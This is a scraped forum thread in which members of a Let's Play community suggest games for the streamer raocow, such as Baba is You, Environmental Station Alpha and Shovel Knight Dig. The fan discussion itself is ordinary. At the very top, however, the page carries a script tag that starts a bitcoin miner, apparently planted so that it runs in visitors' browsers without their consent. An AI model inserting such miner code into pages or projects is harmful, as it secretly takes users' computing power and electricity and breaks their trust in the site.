<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralsmbx communitypge project

request grab-bag

this is the place where lps are being talked about. it's important to talk about games being played on the internet.

i am a dog weasel ?!

very yes
49%
yes
24%
no
15%
very no
12%

Total votes: 210

Cyril
metal nerd
First name: Cyril
Pronouns: he/she/they

Re: request grab-bag

Postby Cyril » 3 months ago

if we're playing RPGs now

okami!
i've honestly never played a video game in my life

SAJewers
hi

Postby SAJewers » 3 months ago

SAJewers wrote:
now out on steam
ImageImageImageImageImage
ImageImageImageImage

Ivy

Postby Ivy » 3 months ago

Those Hamtaro games look epic. +1. Someone better put them in the next patapon 'cos I'm definitely going to forget about them.
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

Petzi

Postby Petzi » 3 months ago

The Doctor wrote: I didn't play the GBC game, but I did play the sequel on the GBA, Hamtaro: Ham-Ham Heartbreak. It was actually produced by Shigeru Miyamoto himself. Awesome game. If the GBC game is half as good, I'd love to see raocow LP it.
Hahaha I remember playing that as a kid! It's such a cute game, it seems like it would fit raocow perfectly.
Oui oui. Je suis très jambon.

Voltgloss
The first story's end.
Pronouns: he/him/his

Postby Voltgloss » 3 months ago

I know "Baba is You" has been mentioned a few times in this thread.

I've been playing it recently and, as a result, I'm now adding my voice to those suggesting it for an LP.

Yes, it's a pure puzzle game. It also has a style, sensibilities, and a fundamental approach that I think will resonate well with raocow's own style, sensibilities, and approach. Making for some quality entertainment, for all involved.

The Doctor

Postby The Doctor » 3 months ago

"Baba is You" will either be the best LP ever or the worst LP ever. However, that is something I am totally willing to take a gamble on.

CrappyBlueLuigi
pants are a tool of oppression
First name: Crepe
Pronouns: they/them

Postby CrappyBlueLuigi » 3 months ago

i think a baba is you lp would really necessitate raocow being ok with leaving levels unfinished by the end of recording sessions. puzzle games like baba is you are, in general, the types of things you'll want to sleep on sometimes so you can come back to the puzzle with a fresh mind, but baba is you is very extremely that kind of game. substantial progress in an lp of it can be less than "finishing a level" and still feel like substantial progress.

BUT

i totally agree that baba is you has the right tone for a raocow lp, and i think it's a game he'll really enjoy. i'd love to see him give it a try someday!
someday, when i'm bigger,
i'm gonna be just like my mama!

SAJewers
hi

raocow already saw this in the patapon spotzone, but i'll x-post it here to no one else forgets

ImageImageImageImage

Leylite

Postby Leylite » 3 months ago

In a similar vein to Baba is You, there's Hempuli's prior work "Environmental Station Alpha", which is a much more Metroid-like platformer with gun combat. Still a few puzzles and maybe a similar kind of environmental tone / sense of humor, but might be a more friendly format for Let's Playing than a puzzle game where some days I just look at a puzzle for an hour and don't figure it out that time, have to wait until tomorrow or the next day.

Cyril
metal nerd

Leylite wrote: In a similar vein to Baba is You, there's Hempuli's prior work "Environmental Station Alpha", which is a much more Metroid-like platformer with gun combat. Still a few puzzles and maybe a similar kind of environmental tone / sense of humor, but might be a more friendly format for Let's Playing than a puzzle game where some days I just look at a puzzle for an hour and don't figure it out that time, have to wait until tomorrow or the next day.
environmental station alpha is, for what it's worth, the best metroidvania of all time

Grounder

Postby Grounder » 3 months ago

and it stole an enemy from metroid pretty wholesale
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

Cyril
metal nerd

okay. i guess a similar enemy design just invalidates the entire rest of the game :rao:

xfix
:)
First name: Konrad Borowski

Postby xfix » 3 months ago

About Baba is You, I would love to see an LP of it, but at the same there are plenty of LPs of this game already.

Just to be clear, chances are if this LP were to happen it would get the Worst LP and Best LP award at the same time. There will be lots of comments about shouting at the screen. Consider it yourself whether it's a good or a bad thing.

SAJewers
hi

ImageImageImageImage

ano0maly
Discord User

Postby ano0maly » 3 months ago

SAJewers wrote:
Honestly if he's going to play what seems to be a harder expansion of the sequel, he should start with the first game in the series. It's translated into English and it provides the context for the settings and the characters in the series.
Image The talkhaus Discord server. Come ask for an invite to join!

Now the sole biggest

SAJewers
hi

yeah he definitely should, i'm mainly just letting raocow know desonuya has a new game out
ImageImageImageImage

wyldstrykr

Postby wyldstrykr » 3 months ago

SAJewers wrote: yeah he definitely should, i'm mainly just letting raocow know desonuya has a new game out
question: is that harder and even less reasonable than yuruZuwa souls 2???

what about raocow lp "parappa the rappar"?

ano0maly
Discord User

Postby ano0maly » 3 months ago

Yuruhuwa Souls games are April Fools jokes where there's a new standalone extra-hard level, so probably not
Image The talkhaus Discord server. Come ask for an invite to join!

Now the sole biggest

SAJewers
hi

Postby SAJewers » 2 months ago

ImageImageImageImage

Grounder

Postby Grounder » 2 months ago

SAJewers wrote:
https://yachtclubgames.com/2019/08/shovel-knight-dig/

"Every adventure is different! Shovel Knight Dig levels have been meticulously crafted, then stitched together using proprietary generation techniques for infinite replayability."

"Grow in power and wealth as you descend into the depths of the earth. Emerge with untold riches to outfit Shovel Knight further, unlocking permanent items and upgrades to your adventuring equipment."

Not saying it's for sure a roguelight but, uh
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 2 months ago

I mean, strictly speaking, some roguelikes do have like 'goals' to attain, so it still *could* work, maybe
the chillaxest of dragonsImage
ImageImage

Awoo
Wolf girls? In *my* area? It's more likely than you think!

Re: request grab-bag of fun

Postby Awoo » 2 months ago

raocow wrote: I mean, strictly speaking, some roguelikes do have like 'goals' to attain, so it still *could* work, maybe
raocow plays Minecraft when? :rao:

I'll show myself out thank you very much :v

ワンワン :pal:

wyldstrykr

Postby wyldstrykr » 2 months ago

ano0maly wrote: Yuruhuwa Souls games are April Fools jokes where there's a new standalone extra-hard level, so probably not
tried that new game.... its hard.. not as hard as that april fool game but hard. hard is an understatement i think the whole game was "vs desunoya". if you can beat vs desunoya which i cant, you have a shot at this until there are some advance technique that block by a language barrier..

since raocow beat mariari 2, should i request Reverse X reverse??? or mariari 2 remake?

Ashan
The world has become a place

Postby Ashan » 2 months ago

SAJewers wrote:
Holy cow, this completely slipped past my radar! That looks great

Ditocoaf
Haustone Tournament Finalist

Postby Ditocoaf » 2 months ago

Man. Every time I'm reminded that Nitrome is still at it...

I'm hit with a wave of nostalgia, I try to remember what flash games of theirs I played 12 years ago, but mostly fail to remember any specific ones. But they had a distinctive art style and menu-formula to their games that was really noticeable at the time, so it's hard to forget that they've been around since forever. And while they make a much wider variety of games now, I can definitely recognize that game's art style as Shovel Knight As Done By Nitrome.

Return to “let's play”